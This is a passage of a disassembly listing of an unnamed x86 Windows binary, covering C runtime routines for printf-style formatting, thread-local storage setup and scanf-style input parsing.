mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnz short loc_416721
mov ecx, 7FFFFFFFh
loc_416721: ; CODE XREF: sub_416492+288�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
mov [ebp+var_10], eax
jz loc_416972
test eax, eax
jnz short loc_416746
mov eax, off_42D7DC
mov [ebp+var_10], eax
loc_416746: ; CODE XREF: sub_416492+2AA�j
mov eax, [ebp+var_10]
mov [ebp+var_28], 1
jmp loc_416964
; ---------------------------------------------------------------------------
loc_416755: ; CODE XREF: sub_416492+267�j
; sub_416492+26B�j
mov [ebp+var_3C], 1
add bl, 20h
loc_41675F: ; CODE XREF: sub_416492+247�j
or [ebp+var_8], 40h
cmp [ebp+var_C], 0
lea esi, [ebp+var_254]
mov [ebp+var_10], esi
jge loc_416866
mov [ebp+var_C], 6
jmp loc_4168AD
; ---------------------------------------------------------------------------
loc_416782: ; CODE XREF: sub_416492+25F�j
test word ptr [ebp+var_8], 830h
jnz short loc_41678E
or byte ptr [ebp+var_8+1], 8
loc_41678E: ; CODE XREF: sub_416492+2F6�j
; sub_416492+336�j
add [ebp+arg_8], 4
test word ptr [ebp+var_8], 810h
mov eax, [ebp+arg_8]
jz short loc_4167FF
movsx eax, word ptr [eax-4]
push eax
lea eax, [ebp+var_254]
push eax
call sub_41C089
test eax, eax
pop ecx
pop ecx
mov [ebp+var_14], eax
jge short loc_41680F
mov [ebp+var_34], 1
jmp short loc_41680F
; ---------------------------------------------------------------------------
loc_4167C0: ; CODE XREF: sub_416492+250�j
sub eax, 5Ah
jz short loc_41681D
sub eax, 9
jz short loc_41678E
dec eax
jnz loc_416AE5
loc_4167D1: ; CODE XREF: sub_416492+48D�j
or [ebp+var_8], 40h
loc_4167D5: ; CODE XREF: sub_416492+4B1�j
mov [ebp+var_14], 0Ah
loc_4167DC: ; CODE XREF: sub_416492+519�j
; sub_416492+532�j ...
mov ebx, [ebp+var_8]
mov esi, 8000h
test ebx, esi
jz loc_416A0D
mov ecx, [ebp+arg_8]
mov eax, [ecx]
mov edx, [ecx+4]
add ecx, 8
mov [ebp+arg_8], ecx
jmp loc_416A35
; ---------------------------------------------------------------------------
loc_4167FF: ; CODE XREF: sub_416492+309�j
mov al, [eax-4]
mov [ebp+var_254], al
mov [ebp+var_14], 1
loc_41680F: ; CODE XREF: sub_416492+323�j
; sub_416492+32C�j
lea eax, [ebp+var_254]
mov [ebp+var_10], eax
jmp loc_416AE5
; ---------------------------------------------------------------------------
loc_41681D: ; CODE XREF: sub_416492+331�j
add [ebp+arg_8], 4
mov eax, [ebp+arg_8]
mov eax, [eax-4]
test eax, eax
jz short loc_416858
mov ecx, [eax+4]
test ecx, ecx
jz short loc_416858
test byte ptr [ebp+var_8+1], 8
movsx eax, word ptr [eax]
mov [ebp+var_10], ecx
jz short loc_41684F
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_28], 1
jmp loc_416AE2
; ---------------------------------------------------------------------------
loc_41684F: ; CODE XREF: sub_416492+3AA�j
and [ebp+var_28], 0
jmp loc_416AE2
; ---------------------------------------------------------------------------
loc_416858: ; CODE XREF: sub_416492+397�j
; sub_416492+39E�j
mov eax, off_42D7D8
mov [ebp+var_10], eax
push eax
jmp loc_416911
; ---------------------------------------------------------------------------
loc_416866: ; CODE XREF: sub_416492+2DE�j
jnz short loc_416876
cmp bl, 67h
jnz short loc_4168AD
mov [ebp+var_C], 1
jmp short loc_4168AD
; ---------------------------------------------------------------------------
loc_416876: ; CODE XREF: sub_416492:loc_416866�j
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_416883
mov [ebp+var_C], eax
loc_416883: ; CODE XREF: sub_416492+3EC�j
mov edi, 0A3h
cmp [ebp+var_C], edi
jle short loc_4168AD
mov eax, [ebp+var_C]
add eax, 15Dh
push eax
call sub_414CAD
test eax, eax
pop ecx
mov [ebp+var_2C], eax
jz short loc_4168AA
mov [ebp+var_10], eax
mov esi, eax
jmp short loc_4168AD
; ---------------------------------------------------------------------------
loc_4168AA: ; CODE XREF: sub_416492+40F�j
mov [ebp+var_C], edi
loc_4168AD: ; CODE XREF: sub_416492+2EB�j
; sub_416492+3D9�j ...
mov eax, [ebp+arg_8]
mov ecx, [eax]
push [ebp+var_3C]
add eax, 8
push [ebp+var_C]
mov [ebp+arg_8], eax
mov eax, [eax-4]
mov [ebp+var_48], eax
movsx eax, bl
push eax
lea eax, [ebp+var_4C]
push esi
push eax
mov [ebp+var_4C], ecx
call off_42DE98
mov edi, [ebp+var_8]
add esp, 14h
and edi, 80h
jz short loc_4168F2
cmp [ebp+var_C], 0
jnz short loc_4168F2
push esi
call off_42DEA4
pop ecx
loc_4168F2: ; CODE XREF: sub_416492+450�j
; sub_416492+456�j
cmp bl, 67h
jnz short loc_416903
test edi, edi
jnz short loc_416903
push esi
call off_42DE9C
pop ecx
loc_416903: ; CODE XREF: sub_416492+463�j
; sub_416492+467�j
cmp byte ptr [esi], 2Dh
jnz short loc_416910
or byte ptr [ebp+var_8+1], 1
inc esi
mov [ebp+var_10], esi
loc_416910: ; CODE XREF: sub_416492+474�j
push esi
loc_416911: ; CODE XREF: sub_416492+3CF�j
call sub_4177F0
pop ecx
jmp loc_416AE2
; ---------------------------------------------------------------------------
loc_41691C: ; CODE XREF: sub_416492+23E�j
sub eax, 69h
jz loc_4167D1
sub eax, 5
jz loc_4169E3
dec eax
jz loc_4169C9
dec eax
jz short loc_416996
sub eax, 3
jz loc_416714
dec eax
dec eax
jz loc_4167D5
sub eax, 3
jnz loc_416AE5
mov [ebp+var_30], 27h
jmp short loc_4169A0
; ---------------------------------------------------------------------------
loc_41695B: ; CODE XREF: sub_416492+4D4�j
dec ecx
cmp word ptr [eax], 0
jz short loc_416968
inc eax
inc eax
loc_416964: ; CODE XREF: sub_416492+2BE�j
test ecx, ecx
jnz short loc_41695B
loc_416968: ; CODE XREF: sub_416492+4CE�j
sub eax, [ebp+var_10]
sar eax, 1
jmp loc_416AE2
; ---------------------------------------------------------------------------
loc_416972: ; CODE XREF: sub_416492+2A2�j
test eax, eax
jnz short loc_41697E
mov eax, off_42D7D8
mov [ebp+var_10], eax
loc_41697E: ; CODE XREF: sub_416492+4E2�j
mov eax, [ebp+var_10]
jmp short loc_41698A
; ---------------------------------------------------------------------------
loc_416983: ; CODE XREF: sub_416492+4FA�j
dec ecx
cmp byte ptr [eax], 0
jz short loc_41698E
inc eax
loc_41698A: ; CODE XREF: sub_416492+4EF�j
test ecx, ecx
jnz short loc_416983
loc_41698E: ; CODE XREF: sub_416492+4F5�j
sub eax, [ebp+var_10]
jmp loc_416AE2
; ---------------------------------------------------------------------------
loc_416996: ; CODE XREF: sub_416492+4A4�j
mov [ebp+var_C], 8
loc_41699D: ; CODE XREF: sub_416492+256�j
mov [ebp+var_30], ecx
loc_4169A0: ; CODE XREF: sub_416492+4C7�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 10h
jz loc_4167DC
mov al, byte ptr [ebp+var_30]
add al, 51h
mov [ebp+var_1C], 30h
mov [ebp+var_1B], al
mov [ebp+var_20], 2
jmp loc_4167DC
; ---------------------------------------------------------------------------
loc_4169C9: ; CODE XREF: sub_416492+49D�j
test byte ptr [ebp+var_8], 80h
mov [ebp+var_14], 8
jz loc_4167DC
or byte ptr [ebp+var_8+1], 2
jmp loc_4167DC
; ---------------------------------------------------------------------------
loc_4169E3: ; CODE XREF: sub_416492+496�j
add [ebp+arg_8], 4
test byte ptr [ebp+var_8], 20h
mov eax, [ebp+arg_8]
mov eax, [eax-4]
jz short loc_4169FC
mov cx, word ptr [ebp+var_18]
mov [eax], cx
jmp short loc_416A01
; ---------------------------------------------------------------------------
loc_4169FC: ; CODE XREF: sub_416492+55F�j
mov ecx, [ebp+var_18]
mov [eax], ecx
loc_416A01: ; CODE XREF: sub_416492+568�j
mov [ebp+var_34], 1
jmp loc_416BD4
; ---------------------------------------------------------------------------
loc_416A0D: ; CODE XREF: sub_416492+354�j
add [ebp+arg_8], 4
test bl, 20h
mov eax, [ebp+arg_8]
jz short loc_416A2B
test bl, 40h
jz short loc_416A25
movsx eax, word ptr [eax-4]
loc_416A22: ; CODE XREF: sub_416492+597�j
; sub_416492+59F�j
cdq
jmp short loc_416A35
; ---------------------------------------------------------------------------
loc_416A25: ; CODE XREF: sub_416492+58A�j
movzx eax, word ptr [eax-4]
jmp short loc_416A22
; ---------------------------------------------------------------------------
loc_416A2B: ; CODE XREF: sub_416492+585�j
test bl, 40h
mov eax, [eax-4]
jnz short loc_416A22
xor edx, edx
loc_416A35: ; CODE XREF: sub_416492+368�j
; sub_416492+591�j
test bl, 40h
jz short loc_416A4F
test edx, edx
jg short loc_416A4F
jl short loc_416A44
test eax, eax
jnb short loc_416A4F
loc_416A44: ; CODE XREF: sub_416492+5AC�j
neg eax
adc edx, 0
neg edx
or byte ptr [ebp+var_8+1], 1
loc_416A4F: ; CODE XREF: sub_416492+5A6�j
; sub_416492+5AA�j ...
test [ebp+var_8], esi
mov ebx, eax
mov edi, edx
jnz short loc_416A5A
xor edi, edi
loc_416A5A: ; CODE XREF: sub_416492+5C4�j
cmp [ebp+var_C], 0
jge short loc_416A69
mov [ebp+var_C], 1
jmp short loc_416A7A
; ---------------------------------------------------------------------------
loc_416A69: ; CODE XREF: sub_416492+5CC�j
and [ebp+var_8], 0FFFFFFF7h
mov eax, 200h
cmp [ebp+var_C], eax
jle short loc_416A7A
mov [ebp+var_C], eax
loc_416A7A: ; CODE XREF: sub_416492+5D5�j
; sub_416492+5E3�j
mov eax, ebx
or eax, edi
jnz short loc_416A84
and [ebp+var_20], 0
loc_416A84: ; CODE XREF: sub_416492+5EC�j
lea esi, [ebp+var_55]
loc_416A87: ; CODE XREF: sub_416492+627�j
mov eax, [ebp+var_C]
dec [ebp+var_C]
test eax, eax
jg short loc_416A97
mov eax, ebx
or eax, edi
jz short loc_416ABB
loc_416A97: ; CODE XREF: sub_416492+5FD�j
mov eax, [ebp+var_14]
cdq
push edx
push eax
push edi
push ebx
call sub_414D90
add ecx, 30h
cmp ecx, 39h
mov [ebp+var_40], ebx
mov ebx, eax
mov edi, edx
jle short loc_416AB6
add ecx, [ebp+var_30]
loc_416AB6: ; CODE XREF: sub_416492+61F�j
mov [esi], cl
dec esi
jmp short loc_416A87
; ---------------------------------------------------------------------------
loc_416ABB: ; CODE XREF: sub_416492+603�j
lea eax, [ebp+var_55]
sub eax, esi
inc esi
test byte ptr [ebp+var_8+1], 2
mov [ebp+var_14], eax
mov [ebp+var_10], esi
jz short loc_416AE5
mov ecx, esi
cmp byte ptr [ecx], 30h
jnz short loc_416AD8
test eax, eax
jnz short loc_416AE5
loc_416AD8: ; CODE XREF: sub_416492+640�j
dec [ebp+var_10]
mov ecx, [ebp+var_10]
mov byte ptr [ecx], 30h
inc eax
loc_416AE2: ; CODE XREF: sub_416492+3B8�j
; sub_416492+3C1�j ...
mov [ebp+var_14], eax
loc_416AE5: ; CODE XREF: sub_416492+270�j
; sub_416492+339�j ...
cmp [ebp+var_34], 0
jnz loc_416BD4
mov ebx, [ebp+var_8]
test bl, 40h
jz short loc_416B1D
test bh, 1
jz short loc_416B02
mov [ebp+var_1C], 2Dh
jmp short loc_416B16
; ---------------------------------------------------------------------------
loc_416B02: ; CODE XREF: sub_416492+668�j
test bl, 1
jz short loc_416B0D
mov [ebp+var_1C], 2Bh
jmp short loc_416B16
; ---------------------------------------------------------------------------
loc_416B0D: ; CODE XREF: sub_416492+673�j
test bl, 2
jz short loc_416B1D
mov [ebp+var_1C], 20h
loc_416B16: ; CODE XREF: sub_416492+66E�j
; sub_416492+679�j
mov [ebp+var_20], 1
loc_416B1D: ; CODE XREF: sub_416492+663�j
; sub_416492+67E�j
mov esi, [ebp+var_24]
sub esi, [ebp+var_20]
sub esi, [ebp+var_14]
test bl, 0Ch
jnz short loc_416B3C
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_416437
add esp, 0Ch
loc_416B3C: ; CODE XREF: sub_416492+697�j
push [ebp+var_20]
mov edi, [ebp+arg_0]
lea eax, [ebp+var_18]
lea ecx, [ebp+var_1C]
call sub_41645B
test bl, 8
pop ecx
jz short loc_416B67
test bl, 4
jnz short loc_416B67
push edi
push esi
push 30h
lea eax, [ebp+var_18]
call sub_416437
add esp, 0Ch
loc_416B67: ; CODE XREF: sub_416492+6BF�j
; sub_416492+6C4�j
cmp [ebp+var_28], 0
jz short loc_416BAE
cmp [ebp+var_14], 0
jle short loc_416BAE
mov eax, [ebp+var_14]
mov ebx, [ebp+var_10]
mov [ebp+var_40], eax
loc_416B7C: ; CODE XREF: sub_416492+718�j
dec [ebp+var_40]
xor eax, eax
mov ax, [ebx]
push eax
lea eax, [ebp+var_54]
push eax
call sub_41C089
inc ebx
pop ecx
inc ebx
test eax, eax
pop ecx
jle short loc_416BBD
mov edi, [ebp+arg_0]
push eax
lea eax, [ebp+var_18]
lea ecx, [ebp+var_54]
call sub_41645B
cmp [ebp+var_40], 0
pop ecx
jnz short loc_416B7C
jmp short loc_416BBD
; ---------------------------------------------------------------------------
loc_416BAE: ; CODE XREF: sub_416492+6D9�j
; sub_416492+6DF�j
push [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ebp+var_18]
call sub_41645B
pop ecx
loc_416BBD: ; CODE XREF: sub_416492+702�j
; sub_416492+71A�j
test byte ptr [ebp+var_8], 4
jz short loc_416BD4
push [ebp+arg_0]
lea eax, [ebp+var_18]
push esi
push 20h
call sub_416437
add esp, 0Ch
loc_416BD4: ; CODE XREF: sub_416492+576�j
; sub_416492+657�j ...
cmp [ebp+var_2C], 0
jz short loc_416BE7 ; default
push [ebp+var_2C]
call sub_414844
and [ebp+var_2C], 0
pop ecx
loc_416BE7: ; CODE XREF: sub_416492+74�j
; sub_416492+99�j ...
mov edi, [ebp+arg_4] ; default
mov bl, [edi]
test bl, bl
jnz loc_4164C7
loc_416BF4: ; CODE XREF: sub_416492+40�j
pop edi
pop esi
loc_416BF6: ; CODE XREF: sub_416492+29�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+var_18]
pop ebx
call sub_41A026
leave
retn
sub_416492 endp
; ---------------------------------------------------------------------------
off_416C07 dd offset loc_416691 ; DATA XREF: sub_416492+7A�r
dd offset loc_416513 ; jump table for switch statement
dd offset loc_416530
dd offset loc_41657C
dd offset loc_4165B7
dd offset loc_4165C0
dd offset loc_4165F8
dd offset loc_4166CA
; =============== S U B R O U T I N E =======================================
sub_416C27 proc near ; CODE XREF: sub_416CB6:loc_416CCF�p
; sub_416CB6:loc_416D1C�p
call sub_417FCC
mov eax, dword_42D7E0
cmp eax, 0FFFFFFFFh
jz short locret_416C44
push eax
call ds:dword_42016C ; TlsFree
or dword_42D7E0, 0FFFFFFFFh
locret_416C44: ; CODE XREF: sub_416C27+D�j
retn
sub_416C27 endp
; =============== S U B R O U T I N E =======================================
sub_416C45 proc near ; CODE XREF: sub_4145C4�p sub_4145D1�p ...
push ebx
push esi
call ds:dword_420008 ; RtlGetLastWin32Error
push dword_42D7E0
mov ebx, eax
call ds:dword_42017C ; TlsGetValue
mov esi, eax
test esi, esi
jnz short loc_416CAA
push 88h
push 1
call sub_41C0B0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_416CA2
push esi
push dword_42D7E0
call ds:dword_420178 ; TlsSetValue
test eax, eax
jz short loc_416CA2
mov dword ptr [esi+54h], offset dword_42E058
mov dword ptr [esi+14h], 1
call ds:dword_420174 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_416CAA
; ---------------------------------------------------------------------------
loc_416CA2: ; CODE XREF: sub_416C45+2E�j
; sub_416C45+3F�j
push 10h
call sub_4160D0
pop ecx
loc_416CAA: ; CODE XREF: sub_416C45+1A�j
; sub_416C45+5B�j
push ebx
call ds:dword_420170 ; RtlRestoreLastWin32Error
mov eax, esi
pop esi
pop ebx
retn
sub_416C45 endp
; =============== S U B R O U T I N E =======================================
sub_416CB6 proc near ; CODE XREF: .text:loc_4161F4�p
call sub_417F83
test eax, eax
jz short loc_416CCF
call ds:dword_420180 ; TlsAlloc
cmp eax, 0FFFFFFFFh
mov dword_42D7E0, eax
jnz short loc_416CD7
loc_416CCF: ; CODE XREF: sub_416CB6+7�j
call sub_416C27
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_416CD7: ; CODE XREF: sub_416CB6+17�j
push esi
push 88h
push 1
call sub_41C0B0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_416D1C
push esi
push dword_42D7E0
call ds:dword_420178 ; TlsSetValue
test eax, eax
jz short loc_416D1C
mov dword ptr [esi+54h], offset dword_42E058
mov dword ptr [esi+14h], 1
call ds:dword_420174 ; GetCurrentThreadId
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_416D1C: ; CODE XREF: sub_416CB6+34�j
; sub_416CB6+45�j
call sub_416C27
xor eax, eax
pop esi
retn
sub_416CB6 endp
; =============== S U B R O U T I N E =======================================
sub_416D25 proc near ; CODE XREF: sub_416D3B+52�p
; sub_416D3B+1EF�p ...
dec dword ptr [edx+4]
js short loc_416D33
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_416D33: ; CODE XREF: sub_416D25+3�j
push edx
call sub_418C09
pop ecx
retn
sub_416D25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D3B proc near ; CODE XREF: sub_4145F3+2A�p
var_1D8 = word ptr -1D8h
var_1D4 = byte ptr -1D4h
var_1D3 = byte ptr -1D3h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = byte ptr -1C8h
var_1C7 = byte ptr -1C7h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 1C8h
push offset stru_428E48
call __SEH_prolog
mov eax, dword_42DEB8
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor eax, eax
mov [ebp+var_20], eax
mov [ebp+var_24], eax
mov [ebp+var_28], eax
and [ebp+var_29], al
mov [ebp+var_30], eax
mov [ebp+var_34], eax
loc_416D69: ; CODE XREF: sub_416D3B+88�j
; sub_416D3B+A55�j ...
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jz loc_4177A8
movzx eax, al
push eax
call sub_41C1E4
pop ecx
test eax, eax
jz short loc_416DC5
dec [ebp+var_30]
loc_416D87: ; CODE XREF: sub_416D3B+62�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416D25
mov esi, eax
push esi
call sub_41C1E4
pop ecx
test eax, eax
jnz short loc_416D87
cmp esi, 0FFFFFFFFh
jz short loc_416DAF
push [ebp+arg_0]
push esi
call sub_41C21E
pop ecx
pop ecx
loc_416DAF: ; CODE XREF: sub_416D3B+67�j
; sub_416D3B+86�j
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
push eax
call sub_41C1E4
pop ecx
test eax, eax
jnz short loc_416DAF
jmp short loc_416D69
; ---------------------------------------------------------------------------
loc_416DC5: ; CODE XREF: sub_416D3B+47�j
mov esi, [ebp+arg_4]
cmp byte ptr [esi], 25h
jnz loc_417724
xor edi, edi
mov [ebp+var_38], edi
and [ebp+var_39], 0
mov [ebp+var_40], edi
mov [ebp+var_44], edi
mov [ebp+var_48], edi
and [ebp+var_49], 0
and [ebp+var_4A], 0
and [ebp+var_4B], 0
and [ebp+var_4C], 0
and [ebp+var_4D], 0
and [ebp+var_4E], 0
mov [ebp+var_4F], 1
mov [ebp+var_54], edi
loc_416E02: ; CODE XREF: sub_416D3B+186�j
inc esi
movzx ebx, byte ptr [esi]
movzx eax, bl
push eax
call sub_41C16B
pop ecx
test eax, eax
jz short loc_416E23
inc [ebp+var_44]
lea eax, [edi+edi*4]
lea edi, [ebx+eax*2-30h]
jmp loc_416EBD
; ---------------------------------------------------------------------------
loc_416E23: ; CODE XREF: sub_416D3B+D7�j
cmp ebx, 4Eh
jg short loc_416E9B
jz loc_416EBD
cmp ebx, 2Ah
jz short loc_416E96
cmp ebx, 46h
jz loc_416EBD
cmp ebx, 49h
jz short loc_416E4B
cmp ebx, 4Ch
jnz short loc_416EAA
inc [ebp+var_4F]
jmp short loc_416EBD
; ---------------------------------------------------------------------------
loc_416E4B: ; CODE XREF: sub_416D3B+104�j
mov cl, [esi+1]
cmp cl, 36h
jnz short loc_416E6A
lea eax, [esi+2]
cmp byte ptr [eax], 34h
jnz short loc_416E6A
mov esi, eax
inc [ebp+var_54]
and [ebp+var_5C], 0
and [ebp+var_58], 0
jmp short loc_416EBD
; ---------------------------------------------------------------------------
loc_416E6A: ; CODE XREF: sub_416D3B+116�j
; sub_416D3B+11E�j
cmp cl, 33h
jnz short loc_416E7B
lea eax, [esi+2]
cmp byte ptr [eax], 32h
jnz short loc_416E7B
mov esi, eax
jmp short loc_416EBD
; ---------------------------------------------------------------------------
loc_416E7B: ; CODE XREF: sub_416D3B+132�j
; sub_416D3B+13A�j
cmp cl, 64h
jz short loc_416EBD
cmp cl, 69h
jz short loc_416EBD
cmp cl, 6Fh
jz short loc_416EBD
cmp cl, 78h
jz short loc_416EBD
cmp cl, 58h
jnz short loc_416EAA
jmp short loc_416EBD
; ---------------------------------------------------------------------------
loc_416E96: ; CODE XREF: sub_416D3B+F6�j
inc [ebp+var_4B]
jmp short loc_416EBD
; ---------------------------------------------------------------------------
loc_416E9B: ; CODE XREF: sub_416D3B+EB�j
cmp ebx, 68h
jz short loc_416EB7
cmp ebx, 6Ch
jz short loc_416EAF
cmp ebx, 77h
jz short loc_416EB2
loc_416EAA: ; CODE XREF: sub_416D3B+109�j
; sub_416D3B+157�j
inc [ebp+var_4C]
jmp short loc_416EBD
; ---------------------------------------------------------------------------
loc_416EAF: ; CODE XREF: sub_416D3B+168�j
inc [ebp+var_4F]
loc_416EB2: ; CODE XREF: sub_416D3B+16D�j
inc [ebp+var_4E]
jmp short loc_416EBD
; ---------------------------------------------------------------------------
loc_416EB7: ; CODE XREF: sub_416D3B+163�j
dec [ebp+var_4F]
dec [ebp+var_4E]
loc_416EBD: ; CODE XREF: sub_416D3B+E3�j
; sub_416D3B+ED�j ...
cmp [ebp+var_4C], 0
jz loc_416E02
mov [ebp+var_48], edi
mov [ebp+arg_4], esi
cmp [ebp+var_4B], 0
jnz short loc_416EE7
mov eax, [ebp+arg_8]
mov [ebp+var_60], eax
add eax, 4
mov [ebp+arg_8], eax
mov ebx, [eax-4]
mov [ebp+var_64], ebx
jmp short loc_416EEA
; ---------------------------------------------------------------------------
loc_416EE7: ; CODE XREF: sub_416D3B+196�j
mov ebx, [ebp+var_64]
loc_416EEA: ; CODE XREF: sub_416D3B+1AA�j
and [ebp+var_4C], 0
cmp [ebp+var_4E], 0
jnz short loc_416F08
mov al, [esi]
cmp al, 53h
jz short loc_416F04
cmp al, 43h
jz short loc_416F04
or [ebp+var_4E], 0FFh
jmp short loc_416F08
; ---------------------------------------------------------------------------
loc_416F04: ; CODE XREF: sub_416D3B+1BD�j
; sub_416D3B+1C1�j
mov [ebp+var_4E], 1
loc_416F08: ; CODE XREF: sub_416D3B+1B7�j
; sub_416D3B+1C7�j
movzx edi, byte ptr [esi]
or edi, 20h
mov [ebp+var_68], edi
cmp edi, 6Eh
jz short loc_416F3F
cmp edi, 63h
jz loc_416F9F
cmp edi, 7Bh
jz short loc_416F9F
loc_416F24: ; CODE XREF: sub_416D3B+1FF�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_416D25
mov esi, eax
push esi
call sub_41C1E4
pop ecx
test eax, eax
jnz short loc_416F24
mov [ebp+var_28], esi
loc_416F3F: ; CODE XREF: sub_416D3B+1D9�j
mov esi, [ebp+arg_0]
loc_416F42: ; CODE XREF: sub_416D3B+274�j
mov ecx, [ebp+var_44]
test ecx, ecx
jz short loc_416F53
cmp [ebp+var_48], 0
jz loc_4171A8
loc_416F53: ; CODE XREF: sub_416D3B+20C�j
cmp edi, 6Fh
jg loc_417177
jz loc_4174EA
cmp edi, 63h
jz loc_417156
cmp edi, 64h
jz loc_4174EA
jle loc_41719D
cmp edi, 67h
jle short loc_416FC9
cmp edi, 69h
jz short loc_416FB1
cmp edi, 6Eh
jnz loc_41719D
mov eax, [ebp+var_30]
cmp [ebp+var_4B], 0
jz loc_4176FC
jmp loc_41771C
; ---------------------------------------------------------------------------
loc_416F9F: ; CODE XREF: sub_416D3B+1DE�j
; sub_416D3B+1E7�j
inc [ebp+var_30]
mov esi, [ebp+arg_0]
mov edx, esi
call sub_416D25
mov [ebp+var_28], eax
jmp short loc_416F42
; ---------------------------------------------------------------------------
loc_416FB1: ; CODE XREF: sub_416D3B+247�j
push 64h
pop edi
loc_416FB4: ; CODE XREF: sub_416D3B+457�j
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz loc_4173E3
mov [ebp+var_4A], 1
jmp loc_4173E8
; ---------------------------------------------------------------------------
loc_416FC9: ; CODE XREF: sub_416D3B+242�j
lea esi, [ebp+var_1C8]
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_416FE5
mov [ebp+var_1C8], bl
lea esi, [ebp+var_1C7]
jmp short loc_416FEA
; ---------------------------------------------------------------------------
loc_416FE5: ; CODE XREF: sub_416D3B+29A�j
cmp ebx, 2Bh
jnz short loc_417001
loc_416FEA: ; CODE XREF: sub_416D3B+2A8�j
dec [ebp+var_48]
inc [ebp+var_30]
mov edi, [ebp+arg_0]
mov edx, edi
call sub_416D25
mov ebx, eax
mov [ebp+var_28], ebx
jmp short loc_417004
; ---------------------------------------------------------------------------
loc_417001: ; CODE XREF: sub_416D3B+2AD�j
mov edi, [ebp+arg_0]
loc_417004: ; CODE XREF: sub_416D3B+2C4�j
cmp [ebp+var_44], 0
jz short loc_417013
cmp [ebp+var_48], 15Dh
jle short loc_41703B
loc_417013: ; CODE XREF: sub_416D3B+2CD�j
mov [ebp+var_48], 15Dh
jmp short loc_41703B
; ---------------------------------------------------------------------------
loc_41701C: ; CODE XREF: sub_416D3B+309�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_417046
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_416D25
mov ebx, eax
mov [ebp+var_28], ebx
loc_41703B: ; CODE XREF: sub_416D3B+2D6�j
; sub_416D3B+2DF�j
push ebx
call sub_41C16B
pop ecx
test eax, eax
jnz short loc_41701C
loc_417046: ; CODE XREF: sub_416D3B+2E9�j
cmp byte_42E108, bl
jnz short loc_417098
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_417098
inc [ebp+var_30]
mov edx, edi
call sub_416D25
mov ebx, eax
mov al, byte_42E108
mov [esi], al
inc esi
jmp short loc_41708A
; ---------------------------------------------------------------------------
loc_41706E: ; CODE XREF: sub_416D3B+35B�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_417098
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_416D25
mov ebx, eax
loc_41708A: ; CODE XREF: sub_416D3B+331�j
push ebx
mov [ebp+var_28], ebx
call sub_41C16B
pop ecx
test eax, eax
jnz short loc_41706E
loc_417098: ; CODE XREF: sub_416D3B+311�j
; sub_416D3B+31B�j ...
cmp [ebp+var_40], 0
jz short loc_41710D
cmp ebx, 65h
jz short loc_4170A8
cmp ebx, 45h
jnz short loc_41710D
loc_4170A8: ; CODE XREF: sub_416D3B+366�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_41710D
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_416D25
mov ebx, eax
mov [ebp+var_28], ebx
cmp ebx, 2Dh
jnz short loc_4170CF
mov [esi], al
inc esi
jmp short loc_4170D4
; ---------------------------------------------------------------------------
loc_4170CF: ; CODE XREF: sub_416D3B+38D�j
cmp ebx, 2Bh
jnz short loc_417102
loc_4170D4: ; CODE XREF: sub_416D3B+392�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jnz short loc_4170F3
and [ebp+var_48], eax
jmp short loc_417102
; ---------------------------------------------------------------------------
loc_4170E3: ; CODE XREF: sub_416D3B+3D0�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_41710D
inc [ebp+var_40]
mov [esi], bl
inc esi
loc_4170F3: ; CODE XREF: sub_416D3B+3A1�j
mov edx, edi
inc [ebp+var_30]
call sub_416D25
mov ebx, eax
mov [ebp+var_28], ebx
loc_417102: ; CODE XREF: sub_416D3B+397�j
; sub_416D3B+3A6�j
push ebx
